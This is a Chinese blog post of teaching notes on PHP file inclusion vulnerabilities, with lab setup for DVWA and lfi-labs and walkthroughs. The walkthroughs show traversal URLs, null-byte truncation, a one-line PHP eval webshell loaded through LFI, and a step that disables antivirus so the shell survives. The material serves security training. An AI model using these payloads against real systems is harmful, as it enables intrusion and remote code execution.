



<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Parallel universe" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Parallel universe" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="Parallel universe" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.3">

  
  <meta name="keywords" content="web,文件包含" />


<link rel="canonical" href="http://example.com/2020/10/19/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">



  <title>
文件包含 - web |
Yume Shoka = Parallel universe</title>
<meta name="generator" content="Hexo 5.2.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">文件包含
  </h1>
  
<div class="meta">
  <span class="item" title="Created: 2020-10-19 21:56:19">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">Posted on</span>
    <time itemprop="dateCreated datePublished" datetime="2020-10-19T21:56:19+08:00">2020-10-19</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="Toggle navigation bar">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Yume Shoka</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclhnx9glj20zk0m8npd.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipesng5oej20zk0m87d4.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gicliierfjj20zk0m8npd.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclimtf7dj20zk0m8qav.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclhtuo6nj20zk0m8ttm.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giciub8ja1j20zk0m81ky.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main id="main">
      <div class="inner">
        <div id="content" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">Home</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/web/" itemprop="item" rel="index" title="In web"><span itemprop="name">web</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="en">
  <link itemprop="mainEntityOfPage" href="http://example.com/2020/10/19/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="1ss4k">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Parallel universe">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="0x00-文件包含的基础知识"><a href="#0x00-文件包含的基础知识" class="headerlink" title="0x00 文件包含的基础知识"></a>0x00 文件包含的基础知识</h1><h2 id="文件包含的概念"><a href="#文件包含的概念" class="headerlink" title="文件包含的概念"></a>文件包含的概念</h2><p>服务器执行PHP代码时，可以通过文件包含函数将文件包含进来，使用包含文件的代码。它的目的是更好地使用代码的重用性，简化开发流程，因为可以创建一个模板，在其他情况下重复使用。(其实除了PHP，Java、python里面都有文件包含的概念，Java–包，python–模块，import)</p>
<h2 id="文件包含函数"><a href="#文件包含函数" class="headerlink" title="文件包含函数"></a>文件包含函数</h2><p>PHP中的文件包含函数有四个</p>
<p><code>require()</code> </p>
<p><code>require_once()</code></p>
<p><code>include()</code></p>
<p><code>include_once()</code></p>
<p><code>require()</code> 和 <code>include()</code> 的区别是：<code>include</code>如果有错误，抛出警告，程序继续正常运行。<code>require</code> 如果有错误，直接报错并退出程序的执行。<code> XX_once</code> 只包含一次，适用情况：同一个文件被包含&gt;1次，我想让它只被包含一次，从而解决[函数重新定义、变量重新赋值]这些问题。</p>
<p>还有一些文件<strong>读取</strong>的函数：</p>
<p><code>highlight_file</code>: 读取文件并高亮显示</p>
<p><code>readfile</code>: 读取文件</p>
<p><code>file_get_contents</code>: 读取文件，可以读取远程文件</p>
<p><code>fopen</code>: 打开文件</p>
<p><code>file</code> </p>
<p><code>show_source</code>: 显示文件的代码信息</p>
<p>上面这几个是文件读取函数，和文件包含不太一样，文件读取是将文件的内容直接读出来，读成字符串，包含是将包含的文件的代码进行执行。</p>
<h2 id="目录遍历与文件包含的区别"><a href="#目录遍历与文件包含的区别" class="headerlink" title="目录遍历与文件包含的区别"></a>目录遍历与文件包含的区别</h2><p>目录遍历漏洞：限制不严格，导致访问到了原本不该访问的文件。</p>
<p>它和文件包含漏洞的本质以及利用方法都是一样的。</p>
<p>区别：文件包含分为本地文件包含和远程文件包含，目录遍历是对本操作系统的文件进行读取，即目录遍历和本地文件包含一致。</p>
<h2 id="靶场环境"><a href="#靶场环境" class="headerlink" title="靶场环境"></a>靶场环境</h2><h3 id="dvwa"><a href="#dvwa" class="headerlink" title="dvwa"></a>dvwa</h3><p>在Windows中搭建DVWA测试环境。</p>
<p>DVWA是一款基于php&amp;mysql编写的用于常规WEB漏洞教学和检测的应用。其中包含了SQL注入，盲注，文件包含，XSS，CSRF等一些常见的WEB漏洞。</p>
<ul>
<li>下载phpstudy源码和DVWA源码</li>
</ul>
<p>phpstudy源码 <span class="exturl" data-url="aHR0cHM6Ly93d3cueHAuY24vZG93bmxvYWQuaHRtbA==">https://www.xp.cn/download.html</span> —&gt; 解压出exe文件 —&gt; 安装软件 —&gt; 启动Apache和mysql服务 —&gt;访问127.0.0.1，查看站点是否创建成功</p>
<p>dvwa源码 <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2RpZ2luaW5qYS9EVldB">https://github.com/digininja/DVWA</span> —&gt; 下载zip —&gt; 解压 —&gt; 修改文件名为dvwa —&gt; 文件安装到phpstudy\WWW 的目录之下 —&gt; 修改 dvwa/config/config.inc.php.dist 的文件名为 config.inc.php，即删掉dist(如果这里不显示扩展名，点击上方的[ 查看 ] [ 文件扩展名 ]) —&gt; 记事本再打开这个文件，把奇怪的密码‘p@ssw0rd’修改为root</p>
<ul>
<li>重置数据库</li>
</ul>
<p>浏览器输入<span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9kdndhL3NldHVwLnBocA==">http://127.0.0.1/dvwa/setup.php</span> —&gt; 下方的 创建/重置数据库 —&gt;</p>
<p> (有一个错误:  allow_url_include: Disable. 这里要修改的不是dvwa文件夹里的php.ini的文件内容，而是Apache里的php.ini，要返回到phpstudy的安装目录 —&gt; C:\phpstudy_pro\Extensions\php\php7.3.4nts —&gt;php.ini文件 —&gt; allow_url_include=On allow_url_fopen=On —&gt;重启Apache  ) —&gt;</p>
<p>又有一个错误: reCAPTCHA key: <strong>Missing</strong> —&gt; 修改dvwa里的php.ini，使得allow_url_fopen = On和allow_url_include = On，然后进入当前目录下的config文件，打开config.inc.php，使$_DVWA[ ‘recaptcha_public_key’ ]  = ‘’; 和 private_key变为</p>
<p>_DVWA[ ‘recaptcha_public_key’ ]  = ‘6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg’; </p>
<p>__​_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ’;</p>
<p>还是不行，解决下一个错误(Database Error #1045: Access denied for user ‘dvwa’@’localhost’ (using password: NO).) 本质应该是用户密码错误。</p>
<p>尝试1:打开dvwa—&gt;config文件下的config.inc.php，将密码改为空(之前设置为了root) ❌这个方法没用</p>
<p>尝试2:打开phpstudy目录下的extensions —&gt; mysql —&gt;my.ini ，在端口下面添加 skip-grant-tables —&gt; 重启Apache —&gt; 重置，可以进行到主页面了。但是之前设置的用户名dvwa，密码为空，不能登陆.</p>
<p>继续解决，打开mysql文件夹下的mysql.exe，use mysql….. ❌ 还是没用</p>
<p>最后发现是账号密码设置错误了，不要看配置文件里的，直接用默认的 admin/password 即可登陆，完成！✅</p>
<p>搭建过程可以百度，问题解决参考如下</p>
<ul>
<li>参考1 ：<span class="exturl" data-url="aHR0cHM6Ly93d3cuZnJlZXNpb24uY29tL2FydGljbGUvNTg5MDQyNjczNy8=">https://www.freesion.com/article/5890426737/</span></li>
<li>参考2:    <span class="exturl" data-url="aHR0cHM6Ly93d3cuY25ibG9ncy5jb20veHUtdXgvcC8xMjIyMjg5NS5odG1s">https://www.cnblogs.com/xu-ux/p/12222895.html</span></li>
</ul>
<h3 id="LFI-labs"><a href="#LFI-labs" class="headerlink" title="LFI labs"></a>LFI labs</h3><p>github地址 <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL3BhcmFsYXgvbGZpLWxhYnM=">https://github.com/paralax/lfi-labs</span></p>
<p>下载源码，放在phpstudy的WWW目录下，修改文件名为lfi</p>
<p>打开之后，有报错，两个warning，应该是版本不同导致的。</p>
<p>参考 <span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3UwMTE3ODUzMDkvYXJ0aWNsZS9kZXRhaWxzLzEwNTE4MTY1Ng==">https://blog.csdn.net/u011785309/article/details/105181656</span> 添加语句<code> error_reporting(E_ALL &amp; ~E_NOTICE &amp; ~E_WARNING);</code> 即可解决。</p>
<h3 id="phpstudy2018"><a href="#phpstudy2018" class="headerlink" title="phpstudy2018"></a>phpstudy2018</h3><p>由于版本问题，最后还是安装了2018版本的</p>
<h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><h3 id="hackbar"><a href="#hackbar" class="headerlink" title="hackbar"></a>hackbar</h3><p>下载火狐浏览器 —&gt; 最右上角 —&gt; 附加组件 —&gt; 搜索hackbar —&gt; 添加 —&gt; 发现不能使用，需要license ❌</p>
<p>使用V2版本 <span class="exturl" data-url="aHR0cHM6Ly9hZGRvbnMubW96aWxsYS5vcmcvZnIvZmlyZWZveC9hZGRvbi9oYWNrYmFyLWZyZWUv">https://addons.mozilla.org/fr/firefox/addon/hackbar-free/</span> 添加即可</p>
<h3 id="蚁剑"><a href="#蚁剑" class="headerlink" title="蚁剑"></a>蚁剑</h3><ul>
<li>下载蚁剑源码和加载器，安装</li>
</ul>
<p>在桌面win10的文件夹中，文件夹名字较长的那个。</p>
<h3 id="burpsuite"><a href="#burpsuite" class="headerlink" title="burpsuite"></a>burpsuite</h3><p>mac里面的尝试了一下，直接<code>./run.sh</code>就可以运行bp，但是火狐浏览器出现了[有软件正在阻止 Firefox 安全地连接至此网站]，参考 <span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4NjMyMTUxL2FydGljbGUvZGV0YWlscy8xMDI2MjY4NDU=">https://blog.csdn.net/qq_38632151/article/details/102626845</span> ，进行证书的导入，就可以再使用了。</p>
<p>Windows下安装</p>
<ul>
<li>首先需要配置Java环境</li>
</ul>
<p>C:\Users\my&gt;java -version<br>java version “1.8.0_231”<br>Java(TM) SE Runtime Environment (build 1.8.0_231-b11)<br>Java HotSpot(TM) 64-Bit Server VM (build 25.231-b11, mixed mode)</p>
<ul>
<li>查看jdk的安装位置</li>
</ul>
<p>[Loaded java.lang.Shutdown from C:\Program Files\Java\jre1.8.0_231\lib\rt.jar]<br>[Loaded java.lang.Shutdown$Lock from C:\Program Files\Java\jre1.8.0_231\lib\rt.jar]</p>
<ul>
<li>打开</li>
</ul>
<p>右键—属性—更改—打开方式选择jdk—bin—java.exe</p>
<ul>
<li>重新安装Java</li>
</ul>
<p>.jar文件还是无法打开，可能是版本过低，重新安装更高版本的jdk-8u271-windows-x64</p>
<p>…. 环境不容易配置好</p>
<p>最后是xxzwj帮我弄好的，地址C:\my_homework\burpsuite_pro_v2.0，双击运行burp.bat，即可</p>
<p>用Firefox，switchomega，提示连接不安全，导入证书。导入到之前下载的证书之后，还是不成功，应该是证书不能通用。同样参考文章  <span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4NjMyMTUxL2FydGljbGUvZGV0YWlscy8xMDI2MjY4NDUlRUYlQkMlOEMlRTQlQjglOEIlRTglQkQlQkQlRTUlQUYlQkMlRTUlODUlQTUlRUYlQkMlOEMlRTUlQUUlOEMlRTYlODglOTAlRTMlODAlODI=">https://blog.csdn.net/qq_38632151/article/details/102626845，下载导入，完成。</span></p>
<p>火狐配置成功了，再配置一下IE浏览器。IE浏览器不太方便，临时用了chrome代替。</p>
<p>扩展程序中搜索<a target="_blank" rel="noopener" href="https://chrome.google.com/webstore/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif"><strong>Proxy SwitchyOmega</strong></a>, proxy添加地址，应用选项。重新下载导入证书。</p>
<p>chrome中没找到“选项”，直接点击下载好的证书，安装 ❌ 安装不了</p>
<p>bp中导入证书，Mac—home—download，导入、成功。</p>
<p>参考 <span class="exturl" data-url="aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vdGhlc3BhY2UvcC8xMjMzMDM0OS5odG1s">https://www.cnblogs.com/thespace/p/12330349.html</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuYW5xdWFua2UuY29tL3Bvc3QvaWQvODU5MjU=">https://www.anquanke.com/post/id/85925</span></p>
<p>✅！</p>
<ul>
<li>抓取本地的包</li>
</ul>
<p>burpsuite抓包是默认不抓取本地的，所以我们要进行修改。</p>
<p>ipconfig查看本机ip地址是10.211.55.3</p>
<p>访问的url改成 <span class="exturl" data-url="aHR0cDovLzEwLjIxMS41NS4zL2xmaS9MRkktMS8=">http://10.211.55.3/lfi/LFI-1/</span> ，即可成功访问。</p>
<p>或者在浏览器中，将[不代理的地址列表]中的127.0.0.1删掉，即可。</p>
<h3 id="curl"><a href="#curl" class="headerlink" title="curl"></a>curl</h3><p>官网下载 <span class="exturl" data-url="aHR0cHM6Ly9jdXJsLmhheHguc2UvZG93bmxvYWQuaHRtbA==">https://curl.haxx.se/download.html</span></p>
<p>下载到了windows的Downloads，解压到了C盘</p>
<p>增加环境变量，变量名CURL_HOME，值C:\curl-7.73.0-win64-mingw\bin</p>
<p>path环境变量增加%CURL_HOME%</p>
<p>打开cmd，输入curl –help</p>
<p>安装配置参考 <span class="exturl" data-url="aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vZ2FvaC9wLzExMDY5NjI4Lmh0bWw=">https://www.cnblogs.com/gaoh/p/11069628.html</span></p>
<h2 id="讲授思路"><a href="#讲授思路" class="headerlink" title="讲授思路"></a>讲授思路</h2><p>上午—相关函数解析/php伪协议/日志文件包含</p>
<p>下午—session文件包含/安全加固</p>
<h1 id="0x01-文件包含漏洞基础知识"><a href="#0x01-文件包含漏洞基础知识" class="headerlink" title="0x01 文件包含漏洞基础知识"></a>0x01 文件包含漏洞基础知识</h1><h2 id="漏洞产生的原因"><a href="#漏洞产生的原因" class="headerlink" title="漏洞产生的原因"></a>漏洞产生的原因</h2><p>开发人员为了使代码更加灵活，将被包含的文件设置为变量，用来进行动态的调试。文件包含的参数没有经过过滤或严格的定义，可以被用户所控制，包含其他恶意文件，导致执行了非预期的代码。</p>
<p>例如最简单的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  $filename = $_GET[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">	<span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>声明变量是用$(dollar)开头，从GET请求里面获取一个参数为filename的值，给变量filename。</p>
<p><code>$_GET[&#39;filename&#39;]</code> 没有经过严格的过滤，直接带入了include函数，攻击者可以修改它的值，执行非预期的操作。</p>
<h2 id="本地文件包含漏洞"><a href="#本地文件包含漏洞" class="headerlink" title="本地文件包含漏洞"></a>本地文件包含漏洞</h2><p>它是指：‘能打开并且包含本地文件’的一种漏洞</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  $filename = $_GET[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">	<span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<p>[题目1]</p>
<p>来源：dvwa-file inclusion- low</p>
<p>(若让学员操作，可使用在线靶场 <span class="exturl" data-url="aHR0cDovLzQzLjI0Ny45MS4yMjg6ODEv">http://43.247.91.228:81/</span> admin password)</p>
<p>目标：获取敏感信息</p>
<p><strong>wp</strong></p>
<p>file1: </p>
<ul>
<li>查看源码，有语句 $file = ​_GET[ ‘page’ ];</li>
<li>打开文件夹 C:\phpstudy_pro\WWW\dvwa\vulnerabilities\fi中的index.php，可以看到low.php又被包含在其中，这就构成了文件包含漏洞。</li>
<li>在file1同级目录下新建一个名为ah.txt的文本文件，内容如下：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">phpinfo();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>访问 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9kdndhL3Z1bG5lcmFiaWxpdGllcy9maS8/cGFnZT1haC50eHQ=">http://127.0.0.1/dvwa/vulnerabilities/fi/?page=ah.txt</span></li>
</ul>
<p>小补充：文件包含可以包含任意文件，包括图片、文本文件、压缩包等，比如此处包含的是txt文件。如果文件中有服务器能识别的脚本语言，就按照该脚本语言执行，否则就直接显示出源代码。即尝试把创建一个新的文件ah2.txt，输入乱码，会在顶部直接显示出这些信息。</p>
<p>后续怎么利用：如果本地中没有什么值得包含的文件，可以上传一个恶意文件，如上传一个一句话木马，就可以用蚁剑连接。如果文件上传不了，直接把木马输入到url中，就会保存在日志(access_log)中，自己可以再想办法包含access_log文件。(这只是一个思路，不一定可行，利用的难度还是比较大的，比如一些字符有可能被转义)</p>
<p>[题目X]</p>
<p>来源—LFI-1</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEv">http://127.0.0.1/lfi/LFI-1/</span></p>
<p>目标：获取敏感信息</p>
<p><strong>wp</strong></p>
<ul>
<li>在文件夹中查看源码</li>
</ul>
<p>第一句话 <code>&lt;?php  include(&quot;../common/header.php&quot;);   ?&gt;</code> 是包含页面头部的一些信息</p>
<p><code>&lt;?php hint(&quot;will include the arg specified in the GET parameter \&quot;page\&quot;&quot;); ?&gt;</code> 是提示信息，没有思路的时候可以查看。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=<span class="string">&quot;/LFI-1/index.php&quot;</span> method=<span class="string">&quot;GET&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;page&quot;</span>&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<p>是一个form表单，它去请求index.php，方法是GET，接受一个参数page，用到了input输入框。</p>
<p>(?这句话描述是否准确？？？？)实际请求index.php的代码如下</p>
<p>参数名为page。</p>
<p>再讲一句include，如果包含一些敏感文件，比如说一些文件中存储着密码，如果把这些文件包含进来并且显示出来，就有可能造成密码的泄露。一般来说，文件包含漏洞需要和其他方法配合使用，比如配合文件上传漏洞或者注入漏洞，先上传一个文件，然后想办法获取webshell。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>($_GET[<span class="string">&quot;page&quot;</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<ul>
<li><p>使用hackbar，load url，会把URL复制到下面来，用hackbar 比直接在上面写更加方便。</p>
</li>
<li><p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEvP3BhZ2U9Li4vTWFrZWZpbGU=">http://127.0.0.1/lfi/LFI-1/?page=../Makefile</span> 查看文件夹可以发现存在makefile文件，使用如上语句可以读取文件内容。除了可以看这个，还可以看Apache的配置文件、数据库的配置文件、其他的敏感信息等。有时不知道路径，需要一个一个爆破去猜。</p>
<p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEvP3BhZ2U9QzolNUNwaHBzdHVkeV9wcm8lNUNXV1clNUNsZmklNUNEb2NrZXJmaWxl">http://127.0.0.1/lfi/LFI-1/?page=C:\phpstudy_pro\WWW\lfi\Dockerfile</span> 这个是绝对路径，查看Dockerfile文件。</p>
</li>
<li><p>如果要获取webshell，假设根目录中有webshell.php，想办法去包含，但是不知道具体放在哪里，就逐个添加../，这里以phpinfo.php文件为例  <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEvP3BhZ2U9Li4vLi4vcGhwaW5mby5waHA=">http://127.0.0.1/lfi/LFI-1/?page=../../phpinfo.php</span></p>
</li>
<li><p>如果这里不是.php，而是.jpg，还是可以执行显示的。换成txt，也还是可以显示出来的。所以这说明和包含的文件的类型是无关的，只要是php代码并且是合法的php代码，包含进来之后就会执行。</p>
</li>
</ul>
<p>[题目X]</p>
<p>来源—LFI-2</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTIv">http://127.0.0.1/lfi/LFI-2/</span></p>
<p>(⚠️注意，火狐浏览器打不开lfi-2，不知道为什么)</p>
<p>目标：查看敏感信息/获取webshell</p>
<p><strong>wp</strong></p>
<ul>
<li>查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;includes/&quot;</span>.$_GET[<span class="string">&#x27;library&#x27;</span>].<span class="string">&quot;.php&quot;</span>); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>包含一个php文件，但是文件名是由一个get型的参数library来决定的，比如library传的是a，包含的就是a.php，传的是b，包含的就是b.php。在php中，字符串的拼接是用.来表示的。</p>
<p>$_GET 是php的内置函数，它会传入一个变量的名字，去动态的引用php文件。</p>
<ul>
<li><p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvbGZpLTIvP2xpYnJhcnk9QzolNUNwaHBzdHVkeV9wcm8lNUNXV1clNUNsZmklNUNNYWtlZmlsZQ==">http://127.0.0.1/lfi/lfi-2/?library=C:\phpstudy_pro\WWW\lfi\Makefile</span> ，没有任何反应，因为把library传入的内容当作了文件的名称，所以去读取的是“includes/C:\phpstudy_pro\WWW\lfi\Makefile.php”，由于没有这个文件，也就不能正确显示了。</p>
</li>
<li><p>一种方法 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvbGZpLTIvP2xpYnJhcnk9Li4vLi4vLi4vcGhwaW5mbw==">http://127.0.0.1/lfi/lfi-2/?library=../../../phpinfo</span>  去掉php的后缀，由代码自动给我们补上。</p>
</li>
</ul>
<ul>
<li><p>另一种方法：查看提示，可以使用00截断。00截断需要php的版本&lt;5.3.4，这里php的版本过高，不能演示00截断，需要更换版本</p>
</li>
<li><p>00截断</p>
</li>
</ul>
<p>原理：Windows在读文件名时，当遇到ASCII码0时会判断为读取结束，会自动停止对后面内容的读取。在URL中的形式是%00，在十六进制中是0x00。%00到后台后实际上就是16进制的00，读到00之后就认为后面没有其他东西了，就会自动截断了，后面的就不读取了。</p>
<p>但是00截断必须满足2个条件</p>
<p>(1)php的版本&lt;5.3.4</p>
<p>(2)php的magic_quotes_gpc为OFF状态</p>
<p>其他选项菜单—php扩展及设置—参数开关设置—magic_quotes_gpc的勾 给取消掉</p>
<p><code>127.0.0.1/lfi/LFI-2/?library=../../../phpinfo.php%00</code> 即可</p>
<p>如果已经满足以上两个条件了依然执行不成功，有可能是浏览器过滤掉了%00。这时候可以用burpsuite抓包，修改包内容，然后再次发送。</p>
<ul>
<li>首先需要有一个一句话木马文件</li>
</ul>
<p><code>&lt;?php @eval($_POST[ah]); ?&gt;</code> ，修改名字为 webshell.php。</p>
<p>这里有个小坑，Windows10会自动把我的一句话木马文件删掉，在Windows安全中心—病毒和威胁防护—管理设置中关闭实时保护什么的。</p>
<p>用刚才的方式，包含webshell.php，<span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTIvP2xpYnJhcnk9Li4vLi4vLi4vd2Vic2hlbGwucGhwJTAw">http://127.0.0.1/lfi/LFI-2/?library=../../../webshell.php%00</span></p>
<p>打开蚁剑(非首次使用要先清除数据)，右键，添加数据，左上角，添加，成功。</p>
<p>[题目X]</p>
<p>来源—LFI-3</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTMv">http://127.0.0.1/lfi/LFI-3/</span></p>
<p>目标：查看敏感信息/获取webshell</p>
<p><strong>wp</strong></p>
<ul>
<li>查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=<span class="string">&quot;/LFI-3/index.php&quot;</span> method=<span class="string">&quot;GET&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;file&quot;</span>&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<p>在提交form表单的时候，参数是file。</p>
<p>用绝对路径读取文件，成功获取了敏感信息。</p>
<p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTMvP2ZpbGU9QzovL3BocFN0dWR5L1NvZnR3YXJlRGVzY3JpcHRpb24uSU5J">http://127.0.0.1/lfi/LFI-3/?file=C://phpStudy/SoftwareDescription.INI</span></p>
<ul>
<li>如果想要获取webshell，首先测试phpinfo的页面</li>
</ul>
<p>需要用到相对路径，<span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTMvP2ZpbGU9Li4vLi4vcGhwaW5mby5waHA=">http://127.0.0.1/lfi/LFI-3/?file=../../phpinfo.php</span></p>
<p>报错：You are not allowed to see source files!</p>
